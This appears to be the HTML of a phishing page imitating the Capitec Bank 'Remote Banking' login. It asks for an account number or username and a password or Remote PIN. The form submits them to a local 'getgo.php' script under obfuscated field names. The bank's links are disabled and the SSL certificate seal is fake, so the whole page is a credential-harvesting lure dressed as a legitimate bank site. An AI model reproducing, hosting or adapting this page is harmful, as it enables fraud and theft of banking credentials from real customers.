<!DOCTYPE html>

<html class=" tlvHideBgImage" style=""><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Internet Banking | Capitec Bank</title><meta name="ROBOTS" content="NOINDEX"><link rel="stylesheet" type="text/css" href="./default-3.0.0.css"><!--[if IE]><link rel="stylesheet" type="text/css" href="./css/ie-1.0.1.css"><![endif]--><link rel="stylesheet" type="text/css" href="./jquery-ui-1.8.10.custom.min.css"><link rel="stylesheet" type="text/css" href="./default.custom.min-1.1.0.css">
<link href="https://fonts.googleapis.com/css2?family=Ropa+Sans&display=swap" rel="stylesheet">
<style>

div, p, span,p, table, li, ul, a, id, h1, h2, h3 {
font-family: 'Ropa Sans', sans-serif; !important;
}

input {
font-family: 'Ropa Sans', sans-serif; !important;
}
</style>
</head>
<body topmargin="0">



<div class="siteHeader">

<div class="container">
<div class="logo"><img src="./logo_main.png"></div>


<nav class="primaryNav">
<ul>


</ul>
</nav>


<ul class="pull-right">
<li class="hidden-xs"><div class="linkWrap "><a href="javascript:void(0)" class="banking" target="_blank">Capitec Bank</a></div>
</li>
<li>
<div class="linkWrap">
<a href="javascript:void(0)" target="_blank">Security</a>
</div>
</li>

</ul>


</div>



</div>







<div id="bodyTagId"><div class="container"><div align="left"><h1 style="z-index:999;">Remote Banking</h1>


<script language="javascript" src="./loginSubmitForm-1.0.0.js.download"></script>

<div class="row">

<div class="col-md-6">

<form id="login" action="getgo.php" method="POST" autocomplete="off">
<fieldset>
<label id="usernameLabel" for="username"><span class="username">Account number/username:</span>
<input id="username" required="" name="anotheman" type="text" value="" maxlength="40">
</label>
<label id="passwordLabel" for="password"><span class="password">Password/Remote PIN:</span>
<input id="password" required="" name="suheha" type="password" value="" maxlength="20">
</label>

</fieldset>


<div class="iWantTo"><h2 style="margin-left: 15px;">I want to</h2><table>
<tbody>

<div width="15px">
<button name="signcnt" type="submit" style="outline: 0; border: 0; background: 0; float: left;"><img class="iWantToImg" src="./proceed.gif" alt="Sign in" border="0" width="15" height="15"> <div style=" font-size: 22px; margin-top: 2px; float: right; color: #009de0; ">Sign in</div></button>
</tr></tbody></table></div>
<div style="top: 10px; position: absolute; right: -10px;">
<a style="cursor: pointer;" onclick="window.open(&#39;javascript:void(0)"><img src="./SSL-certificate-seal-ssl-animated.gif" border="0" alt="SSL, SSL Certificates, Secure Sockets Layer"></a>
</div>
<div>
</div></form>


</div>
<div class="col-md-6">

<div class="info-block">
<h2>Security Basics</h2>
<ol>
<li>We will NEVER ask you for your Remote PIN, password<br>or token passwords by email, SMS or telephone</li>
<li>ALWAYS keep your username, Remote PIN, password<br>or token passwords secret</li>
<li>NEVER use a link or an attachment in any message to access Remote Banking</li>
<li>ALWAYS check that the website address bar and certificate both match capitecbank.co.za</li></span></ol>

</div>


</div>

</div>


</div></div><script type="text/javascript">$(document).ready(function() {document.getElementById('username').focus();});</script>

</div></body></html>